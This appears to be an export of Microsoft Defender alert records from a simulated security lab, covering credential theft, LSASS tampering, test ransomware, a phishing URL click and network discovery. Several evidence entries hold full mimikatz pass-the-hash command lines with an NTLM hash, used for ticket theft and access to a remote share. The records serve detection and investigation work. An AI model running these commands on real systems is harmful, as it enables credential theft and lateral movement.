null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:27:36.8066667Z
Suspicious
None
alice
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-11T09:05:50.6533333Z
Suspicious
None
jeff
internal.corp
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T21:06:13.4366667Z
Suspicious
None
darol
corp.local
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-21T02:03:39.9733333Z
Suspicious
None
admin
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1104
e848b07a-87af-4448-9979-09f0b809c8d4
jeff@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T04:44:38.56Z
Suspicious
None
Takeshi
malicious.io
S-1-5-21-7316772-2057538409-3008203053-1001
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043450335889955_-403223918
1ac75d03-b9a3-4d86-b1e7-d5bf1ef6c5e0
741
MicrosoftDefenderForEndpoint
2022-11-18T05:10:33.5890108Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:09:32.2028606Z
2022-11-18T05:13:25.7958168Z
Malicious credential theft tool execution detected
A known credential theft tool execution command line was detected. Either the process itself or its command line indicated an intent to dump users' credentials, keys, plain-text passwords and more.
CredentialAccess
Resolved
High
47
PartiallyInvestigated
TruePositive
SecurityTesting
WindowsDefenderAtp
f5d3c5d8-ec3a-4412-ab45-934d8faff42c
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Medium", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:10:33.7633333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.7633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "NotFound", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-18T05:10:33.7633333Z", "fileName": "Get-KRBTicket.ps1", "filePath": "C:\\M365DAttack", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "8cd78c31fcbe15d0c3ae78c06e5136983b438586", "sha256": "5dbd299b13a978274d1a2bf59b58abc66277896c3ab867783f226750d620e4e1", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:33.7633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-18T05:09:31.2191789Z", "processId": 6500, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:10:33.7633333Z", "fileName": "powershell.exe", "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": "explorer.exe", "parentProcessFilePath": "C:\\Windows", "parentProcessId": 4680, "processCommandLine": "\"powershell.exe\" ", "processCreationTime": "2022-11-18T05:04:12.7150402Z", "processId": 4976, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "6cbce4a295c163791b60fc23d285e6d84f28ee4c", "sha256": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:14:28.32Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-18T05:13:25.0228269Z", "processId": 6668, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638043453312185509_1066303543
8d159ff6-d15f-4161-83b7-666c7df18120
741
MicrosoftDefenderForEndpoint
2022-11-18T05:15:31.2185677Z
2022-11-19T01:35:46.6533333Z
2022-11-19T01:35:46.5533333Z
2022-11-18T05:10:26.1973573Z
2022-11-18T05:14:26.2028186Z
LSASS process memory modified
The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks.
CredentialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
eb025de4-0ad4-4fcb-8ce2-711ee3956107
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1003", "T1003.001", "T1547.005" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "malicious.io", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-18T05:15:31.2733333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:15:31.2733333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe C:\\M365DAttack\\Get-KRBTicket.ps1\\\"\" exit -Wait", "processCreationTime": "2022-11-18T05:09:31.2191789Z", "processId": 6500, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:15:31.4633333Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-18T05:09:25.8967859Z", "processId": 10600, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-11-18T05:19:28.4066667Z", "fileName": "mimikatz.exe", "filePath": "C:\\M365DAttack\\Mimikatz\\x64", "ipAddress": null, "parentProcessCreationTime": "2022-11-18T05:04:12.7150402Z", "parentProcessFileName": "powershell.exe", "parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", "parentProcessId": 4976, "processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit", "processCreationTime": "2022-11-18T05:13:19.6189613Z", "processId": 10176, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "70df765f554ed7392200422c18776b8992c09231", "sha256": "912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
Process
2022-11-21T02:04:34.4833333Z
Suspicious
Active
ronhd
MSDXV2
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
fc870d086c53ded2e94300f7569aa9478186f2c7
a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1
Rubeus.exe
C:\Temp
7,684
ipconfig
2022-11-21T02:02:27.8934015Z
1,972
2022-11-21T02:02:27.8509284Z
cmd.exe
C:\Windows\System32
Detected
36150b3c1b69b5c2da9df4efd86ac6c166924a48
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-11-18T05:12:17.4466667Z
Suspicious
None
ronhd
lab.net
S-1-5-21-2300221942-1987151257-321556088-1111
89b6fc86-af84-47b2-a72d-325362598b2c
ronhd@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-21T04:54:51.0633333Z
Suspicious
None
root
MSDXV8
S-1-5-21-2159906967-4174806019-1002223092-1107
null
steve@msdxv8.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-14T14:45:23.52Z
Suspicious
None
analyst
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638065141690799395_574213459
cdeae75b-8c21-4259-b37e-f8659c85a5f6
794
MicrosoftDefenderForEndpoint
2022-12-13T07:42:49.0799617Z
2022-12-13T07:51:49.87Z
2022-12-13T07:51:49.6590458Z
2022-12-13T07:29:32.109068Z
2022-12-13T07:29:32.109068Z
'Encryptest' ransomware was prevented
Ransomware use common methods to encrypt files using keys that are known only to attackers. As a result, victims are unable to access the contents of the encrypted files. Most ransomware display or drop a ransom note—an image or an HTML file that contains information about how to obtain the attacker-supplied decryption tool for a fee.   To target documents or other files that contain user data, some ransomware look for files in certain locations and files with certain extension names. It is also common for ransomware to rename encrypted files so that they all use the same extension name.  This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
Ransomware
Resolved
Medium
57
SuccessfullyRemediated
null
null
WindowsDefenderAv
51d03c45-b142-4de4-95df-01b0c259d8f6
Automation
null
Encryptest
[]
[ { "aadDeviceId": null, "defenderAvStatus": "Unknown", "deviceDnsName": "malicious.io", "firstSeen": "2022-12-13T07:14:19.242439Z", "healthStatus": "Active", "loggedOnUsers": [], "mdatpDeviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba", "onboardingStatus": "Onboarded", "osBuild": 19043, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "UnassignedGroup", "riskScore": "None", "tags": [], "version": "21H1", "vmMetadata": null } ]
[ { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-13T07:42:49.13Z", "fileName": "ransomware_testfile_unsigned.exe", "filePath": "C:\\M365DPoCLab\\Simulation Files\\Controlled Folder Access", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Prevented", "remediationStatusDetails": "Entity was pre-remediated by Windows Defender", "sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004", "sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": "Prevented", "deviceId": "cce7f66e4871950f3d9695ca2c8efbf3da533aba", "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-12-13T07:42:49.4333333Z", "fileName": "UNSIGNED_ransomware_test_exe.exe", "filePath": "C:\\M365DPoCLab\\Simulation Files\\Attack Surface Reduction\\Block Execution of untrusted or unsigned executables inside removable USB media", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Prevented", "remediationStatusDetails": "Entity was pre-remediated by Windows Defender", "sha1": "34dfe1b9798d8c5a67490d0e5f84d2e1a6ba4004", "sha256": "59086539186f7b7b814ed93f181c2a8040c0cc1b88cde1a219e4bbaaf568b073", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Malicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
User
2022-12-13T20:43:38.7033333Z
Unknown
None
darol
msdxv2.m365dpoc
S-1-5-21-2300221942-1987151257-321556088-1110
598763ac-48bb-4671-9472-6be219756e33
darol@msdxv2.m365dpoc.com
null
null
null
null
null
null
null
null
null
null
null
null
null
da638037543503645302_122167875
da638037543503645302_122167875
686
MicrosoftDefenderForEndpoint
2022-11-11T09:05:50.364655Z
2022-11-12T01:35:43.1766667Z
2022-11-12T01:35:42.84Z
2022-11-11T08:15:02.3869452Z
2022-11-11T08:15:02.3869452Z
Suspicious URL clicked
A user opened a potentially malicious URL. This alert was triggered based on a Microsoft Defender for Office 365 alert.
InitialAccess
Resolved
High
null
UnsupportedAlertType
TruePositive
SecurityTesting
MTP
359b36eb-337c-4f1c-b280-8c5e08f9c4a0
takeshi@msdxv2.m365dpoc.com
null
null
[ "T1566.002" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "corp.local", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "High", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": null, "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Process", "evidenceCreationTime": "2022-11-11T09:05:50.6533333Z", "fileName": "outlook.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": "2022-11-10T07:07:26.0872385Z", "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": 4680, "processCommandLine": "\"OUTLOOK.EXE\" ", "processCreationTime": "2022-11-11T07:41:26.4391868Z", "processId": 7076, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "21e48eb44f6d3aec36111c0e39819ab47761c1a5", "sha256": "f772c97ff2827eff3c27ed36a0054300c70ef110a714050e210b64e6d3931712", "url": null, "userPrincipalName": null, "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "File", "evidenceCreationTime": "2022-11-11T09:05:50.6533333Z", "fileName": "outlook.exe", "filePath": "", "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": "21e48eb44f6d3aec36111c0e39819ab47761c1a5", "sha256": "f772c97ff2827eff3c27ed36a0054300c70ef110a714050e210b64e6d3931712", "url": null, "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-11-11T09:05:50.6533333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": null, "accountName": null, "detectionStatus": null, "deviceId": null, "domainName": null, "entityType": "Url", "evidenceCreationTime": "2022-11-11T09:05:50.6533333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": "http://ladmdkakgmhde.docuget.xyz/ab/cgophffmaimgrhhfgck", "userPrincipalName": null, "userSid": null, "verdict": "Suspicious" } ]
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
null
da638001152944897194_415240227
ea30b161-762d-47ea-b261-be7e53ac3cda
486
MicrosoftDefenderForEndpoint
2022-09-30T06:14:54.4897391Z
2022-11-19T01:35:42.7033333Z
2022-10-01T01:36:00.5066667Z
2022-09-30T06:11:51.9906915Z
2022-09-30T06:11:51.9906915Z
Suspicious System Network Configuration Discovery
A known tool or technique was used to gather information on this device. Attackers might be trying to gather information about the target device or network for later attacks.
Discovery
Resolved
Low
null
UnsupportedAlertType
TruePositive
SecurityTesting
WindowsDefenderAtp
9bfe28a9-21eb-4f8a-b51e-38ebd3650c88
msftadmin@msdxv2.m365dpoc.com
null
null
[ "T1016" ]
[ { "aadDeviceId": null, "defenderAvStatus": "Updated", "deviceDnsName": "msdxv2-win10v.msdxv2.m365dpoc.com", "firstSeen": "2022-08-08T08:51:02.455Z", "healthStatus": "Active", "loggedOnUsers": [ { "accountName": "jeff", "domainName": "MSDXV2" } ], "mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "onboardingStatus": "Onboarded", "osBuild": 17763, "osPlatform": "Windows10", "osProcessor": "x64", "rbacGroupName": "Full Auto Clients", "riskScore": "Low", "tags": [ "Full auto" ], "version": "1809", "vmMetadata": { "cloudProvider": "Unknown", "resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V", "subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c", "vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0" } } ]
[ { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": null, "deviceId": null, "domainName": "msdxv2.m365dpoc", "entityType": "User", "evidenceCreationTime": "2022-09-30T06:14:54.5333333Z", "fileName": null, "filePath": null, "ipAddress": null, "parentProcessCreationTime": null, "parentProcessFileName": null, "parentProcessFilePath": null, "parentProcessId": null, "processCommandLine": null, "processCreationTime": null, "processId": null, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "None", "remediationStatusDetails": null, "sha1": null, "sha256": null, "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", "verdict": "Suspicious" }, { "aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4", "accountName": "jeff", "detectionStatus": "Detected", "deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145", "domainName": "msdxv2.m365dpoc", "entityType": "Process", "evidenceCreationTime": "2022-09-30T06:14:54.5333333Z", "fileName": "nslookup.exe", "filePath": "C:\\Windows\\System32", "ipAddress": null, "parentProcessCreationTime": "2022-09-30T06:11:51.7062175Z", "parentProcessFileName": "cmd.exe", "parentProcessFilePath": "C:\\Windows\\System32", "parentProcessId": 10824, "processCommandLine": "nslookup msdxv2-dc.msdxv2.m365dpoc.com", "processCreationTime": "2022-09-30T06:11:51.7207947Z", "processId": 7544, "registryHive": null, "registryKey": null, "registryValue": null, "registryValueType": null, "remediationStatus": "Active", "remediationStatusDetails": null, "sha1": "9a3be34e8316ebb945a4d5818a4066c91fe98c95", "sha256": "54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6", "url": null, "userPrincipalName": "jeff@msdxv2.m365dpoc.com", "userSid": "S-1-5-21-2300221942-1987151257-321556088-1104", 